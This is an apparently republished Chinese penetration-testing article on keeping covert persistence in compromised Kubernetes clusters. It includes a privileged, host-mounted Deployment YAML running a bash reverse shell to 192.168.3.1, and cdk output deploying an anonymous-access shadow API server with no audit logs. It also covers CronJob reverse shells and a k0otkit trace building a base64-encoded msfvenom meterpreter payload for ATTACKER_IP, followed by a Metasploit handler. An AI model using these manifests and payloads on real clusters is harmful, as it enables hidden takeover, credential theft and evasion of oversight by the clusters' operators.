STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
前言
通过各种方法获得Kubernetes集群中的mastes或者node如何进行权限维持,从而进步渗透利用?比如像linux、windows那样进行?
此处以几种常见方法展开
控制器利用
通过DaemonSet、Deployment创建容器时,可以使容器即使被删除了也能够进步恢复重启,以实现权限维持的效果
涉及相关概念:
ReplicationController(RC):确保在任何时候都有特定数量的Pod处于运行状态
Replication Set(RS):此处推荐使用RS和Deployment代替RC,实际上RS和RC的功能基本一致,目前唯一的一个区别就是RC只支持基于等式的selector
Deployment:实现出来的效果和职责同RC一样,可以理解为RC的升级版本
Deployment
编写反弹shell的yaml文件即可
kind: Deployment # 实现在任何时候都有特定的pod处于运行状态metadata:name: nginx-deploymentlabels:k8s-app: nginx-despec:replicas: 2 # 指定的pod数量selector:matchLabels:app: nginxtemplate:metadata:labels:app: nginxspec:hostNetwork: truehostPID: truecontainers:- name: nginximage: nginximagePullPolicy: IfNotPresentcommand: ["bash"]args: ["-c", "bash -i >& /dev/tcp/192.168.3.1/20221 0>&1"]securityContext:privileged: true # 特权模式volumeMounts:- mountPath: /host # 挂载目录 进目录后chroot ./ bashname: host-rootvolumes:- name: host-roothostPath:path: /type: Directory
node1、node2都将反弹shell如下,因为上面创建的pod会在node1、node2,所以会挨个进行反弹
期间对创建出来的pod进行删除后,deployment将自动创建恢复pod,以再次实现反弹shell权限维持
DaemonSet
同理操作即可,轮流弹shell效果相同
shadowapiserver利用
此处自行部署的shadowapiserver该apiserver同集群内现有的apiserver具备相同功能,同时进步开启了k8s的权限,接收匿名请求且不保存日志,进步使得攻击者能够无痕迹的管理整个集群
查看当前的api-server信息如下
寻找脆弱点,确认如下
cdk直接部署shadowapiserver,效果如下
2022/03/31 06:20:04 shadow api-server deploy success!shadow api-server pod name:kube-apiserver-master-shadow, namespace:kube-system, node name:masterlistening insecure-port: 0.0.0.0:9443listening secure-port: 0.0.0.0:9444 enabled all privilege for system:anonymous usergo further run `cdk kcurl anonymous get http://your-node-intranet-ip:9443/api` to takeover cluster with none audit logs!\
在看眼部署出来的shadow,确认部署成功后的shadowapiserver
相关实现功能配置信息如下
kube-apiserver
--advertise-address=192.168.3.19--allow-privileged=true--authorization-mode=AlwaysAllow--client-ca-file=/etc/kubernetes/pki/ca.crt--enable-admission-plugins=NodeRestriction--enable-bootstrap-token-auth=true--etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt--etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt--insecure-bind-address=0.0.0.0--anonymous-auth=true--etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key--etcd-servers=https://127.0.0.1:2379--insecure-port=9443--kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt--kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname--proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt--proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key--requestheader-allowed-names=front-proxy-client--requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt--requestheader-extra-headers-prefix=X-Remote-Extra---requestheader-group-headers=X-Remote-Group--requestheader-username-headers=X-Remote-User--secure-port=9444--service-account-key-file=/etc/kubernetes/pki/sa.pub--service-cluster-ip-range=10.1.0.0/16--tls-cert-file=/etc/kubernetes/pki/apiserver.crt--tls-private-key-file=/etc/kubernetes/pki/apiserver.key
此处部署成功后,后续我们都可以用这个新的api进行操作【无需认证】
直接获取各类token信息
同理kubectl
cronjob利用
用于执行周期性的动作,通过yaml部署以实现周期性的反弹shell,创建计划任务的yaml
创建成功效果&yaml中反弹shell信息如下
K0otkit利用
技术细节查看:
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw
项目下载:https://github.com/Metarget/k0otkit
下载并赋予项目文件权限,修改ip&端口
生成kootkit,并进步执行反弹shell监听
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]└─# ./pre_exp.sh+ ATTACKER_IP=192.168.3.11+ ATTACKER_PORT=20227+ TEMP_MRT=mrt+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=20227 LHOST=192.168.3.11 -f elf -o mrt++ base64 -w 0++ tr -d '\n'++ xxd -p mrt+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_remote_template.sh┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]└─# ./handle_multi_reverse_shell.sh[*] Using configured payload generic/shell_reverse_tcppayload => linux/x86/meterpreter/reverse_tcpLHOST => 0.0.0.0LPORT => 4444ExitOnSession => false[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 0.0.0.0:4444msf6 exploit(multi/handler) >
上传并执行在攻击机生成的k0otkit.sh文件
执行后效果如下,会在kube-system下的kube-proxy进行修改
上线效果如下
安恒信息
✦
杭州亚运会网络安全服务官方合作伙伴
成都大运会网络信息安全类官方赞助商
武汉军运会、北京一带一路峰会
青岛上合峰会、上海进博会
厦门金砖峰会、G20杭州峰会
支撑单位北京奥运会等近百场国家级
重大活动网络安保支撑单位
END
长按识别二维码关注我们
如有侵权请联系:admin#unsafe.sh